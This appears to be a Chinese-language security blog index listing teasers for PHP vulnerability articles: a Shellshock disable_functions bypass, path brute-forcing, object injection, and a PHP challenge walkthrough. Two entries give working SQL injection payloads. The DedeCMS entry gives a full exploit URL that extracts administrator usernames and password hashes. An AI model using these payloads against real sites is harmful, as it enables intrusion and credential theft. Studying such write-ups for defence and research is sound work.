PHP 5.x Shellshock Exploit (bypass disable_functions)

# Exploit Title: PHP 5.x Shellshock Exploit (bypass disable_functions)
# Google Dork: none
# Date: 10/31/2014
# Exploit Author: Ryan King (Starfall)
# Vendor Homepage: http://php.net
# Software Link: http://php.net/get/php-5.6.2.tar.bz2/from/a/mirror
# Version: 5.* (tested on 5.6.2)
# Tested on: Debian 7 and CentOS 5 and 6
# CVE: CVE-2014-6271

阅读更多PHP 5.x Shellshock Exploit (bypass disable_functions)

当Windows遇上PHP–路径爆破

1.开场白

此次所披露的是以下网页中提出的问题所取得的测试结果:

http://code.google.com/p/pasc2at/wiki/SimplifiedChinese

已知1.php存在,以上脚本访问的结果是:

1.php
1.phP
1.ph< 1.ph>

阅读更多当Windows遇上PHP–路径爆破

Security risk of php string offset

by ryat_at_www.80vul.com
一、前言[关于PCH]

“PCH”及”Php Codz Hacking”是80vul在2009年4月推出的一个项目,主要是在php源代码的基
础分析和探讨一些可以给php应用安全带来影响的’特性’或者’漏洞’。这个项目最早起源于
webzine 0x3里的《高级PHP应用程序漏洞审核技术》[1]:

* 分析php源代码,发现新的漏洞函数“特性”或者漏洞。(在上一节里介绍的那些“漏洞审
计策略”里,都没有php源代码的分析,如果你要进一步找到新的字典,可以在php源代码的
基础上分析下成因,然后根据这个成因来分析寻找新的漏洞函数“特性”或者漏洞。)

而本文就是PCH的一篇,在php的代码基础上分析PHP字符串offset一个可以给PHP应用程序带
来安全风险的小”特性”…

阅读更多Security risk of php string offset

PHPCMS前台设计缺陷导致任意代码执行

#1 前言

猛兽来了,我们应该将其绝杀在门外,但是有些人非得把它放进屋内,才杀之,你们难道不知道猛兽的嘴里可能叼了一个炸药包吗? 砰!!!结果全都完完了…

#2 叼着炸药包的猛兽来了

请先看下面这段代码

这段代码实际意义不大,不过,没关系我们重在研究嘛,一种典型的”将猛兽放进室内,才杀之”的案例,我们来看看

阅读更多PHPCMS前台设计缺陷导致任意代码执行

php反序列unserialize的一个小特性

这几天wordpress的那个反序列漏洞比较火,具体漏洞我就不做分析了,看这篇:http://drops.wooyun.org/papers/596,
你也可以去看英文的原文:http://vagosec.org/2013/09/wordpress-php-object-injection/。

wp官网打了补丁,我试图去bypass补丁,但让我自以为成功的时候,发现我天真了,并没有成功绕过wp的补丁,但却发现了unserialize的一个小特性,在此和大家分享一下。

阅读更多php反序列unserialize的一个小特性

php4fun.sinaapp.com PHP挑战通关攻略

挑战地址:”http://php4fun.sinaapp.com
challenge 1

攻略:

在单引号内的mysql注入,核心就是逃脱单引号,要么生成一个(htmlentities了单引号,不太可能),要么…干掉一个。

所以:

http://php4fun.sinaapp.com/c1/index.php?username=admin\&password=%20or%201%23

阅读更多php4fun.sinaapp.com PHP挑战通关攻略

Codeigniter 利用加密Key(密钥)的对象注入漏洞

0x00 背景
大家好,Codeigniter 是我最喜爱的PHP框架之一。和别人一样,我在这个框架中学习了PHP MVC编程。今天,我决定来分析一下Codeigniter的PHP 对象注入漏洞。

我在接下来的叙述中会把重点放在Codeigniter的Session会话机制上。所有我将会分析的method方法都在CodeIgniter/system/libraries/Session.php文件里。我在本研究过程中使用的是Codeigniter 2.1 版本。

阅读更多Codeigniter 利用加密Key(密钥)的对象注入漏洞

DedeCMS全版本通杀SQL注入漏洞利用代码及工具

dedecms即织梦(PHP开源网站内容管理系统)。织梦内容管理系统(DedeCms) 以简单、实用、开源而闻名,是国内最知名的PHP开源网站管理系统,也是使用用户最多的PHP类CMS系统,近日,网友在dedecms中发现了全版本通杀的SQL注入漏洞,目前官方最新版已修复该漏洞,相关利用代码如下:
EXP:

Exp:plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\’ or mid=@`\’` /*!50000union*//*!50000select*/1,2,3,(select CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin` limit+0,1),5,6,7,8,9%23@`\’`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=111

利用工具源码:

阅读更多DedeCMS全版本通杀SQL注入漏洞利用代码及工具